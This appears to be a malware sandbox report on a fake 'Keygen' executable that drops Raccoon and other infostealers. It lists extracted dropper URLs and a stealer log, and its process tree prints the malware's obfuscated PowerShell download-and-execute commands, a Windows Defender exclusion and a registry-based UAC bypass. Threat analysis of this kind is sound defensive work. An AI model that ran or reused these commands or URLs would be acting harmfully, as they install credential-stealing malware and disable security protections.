Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    149s
  • max time network
    165s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (17).exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 02:24:09 GMT Bot_ID: BAE8C589-5DA1-4C62-BE46-F8D74908CB8C_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: AVGLFESB - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (518 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 3 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 49 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (17).exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (17).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1404
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\53FA.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (17).exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1700
      • C:\Users\Admin\AppData\Local\Temp\53FA.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1844
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\53FA.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1872
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1940
          • C:\Users\Public\ntz.exe
            "C:\Users\Public\ntz.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2520
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2604
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2712
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2712 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\079680827918789\\* & exit
                  8⤵
                    PID:1612
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2712
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1032
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2632
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2736
              • C:\Users\Public\ntz.exe
                "C:\Users\Public\ntz.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2664
                • C:\Users\Admin\AppData\Local\Temp\1ArREUxbRo.exe
                  "C:\Users\Admin\AppData\Local\Temp\1ArREUxbRo.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2460
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\1ArREUxbRo.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1116
                • C:\Users\Admin\AppData\Local\Temp\Xovy2qwudi.exe
                  "C:\Users\Admin\AppData\Local\Temp\Xovy2qwudi.exe"
                  7⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:1988
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:2348
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c C:\Users\Public\Natso.bat
                        9⤵
                          PID:2620
                          • C:\Windows\SysWOW64\reg.exe
                            reg delete hkcu\Environment /v windir /f
                            10⤵
                            • Modifies registry key
                            PID:2764
                          • C:\Windows\SysWOW64\reg.exe
                            reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                            10⤵
                            • Modifies registry key
                            PID:2480
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                            10⤵
                              PID:1304
                            • C:\Windows\SysWOW64\reg.exe
                              reg delete hkcu\Environment /v windir /f
                              10⤵
                              • Modifies registry key
                              PID:2248
                        • C:\Program Files (x86)\internet explorer\ieinstal.exe
                          "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                          8⤵
                            PID:1984
                        • C:\Users\Admin\AppData\Local\Temp\9ttrVNjHzU.exe
                          "C:\Users\Admin\AppData\Local\Temp\9ttrVNjHzU.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of SetWindowsHookEx
                          PID:2524
                          • \??\c:\windows\SysWOW64\cmstp.exe
                            "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\x11s3qnj.inf
                            8⤵
                              PID:2860
                          • C:\Users\Admin\AppData\Local\Temp\eYu7Z9kyxR.exe
                            "C:\Users\Admin\AppData\Local\Temp\eYu7Z9kyxR.exe"
                            7⤵
                            • Executes dropped EXE
                            • Windows security modification
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1884
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "powershell" Get-MpPreference -verbose
                              8⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2944
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\ntz.exe"
                            7⤵
                              PID:2876
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /T 10 /NOBREAK
                                8⤵
                                • Delays execution with timeout.exe
                                PID:1912
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\53FA.tmp\m1.hta"
                      3⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of WriteProcessMemory
                      PID:1788
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1944
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout 1
                      3⤵
                      • Delays execution with timeout.exe
                      PID:1776
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\53FA.tmp\b.hta"
                      3⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of WriteProcessMemory
                      PID:2028
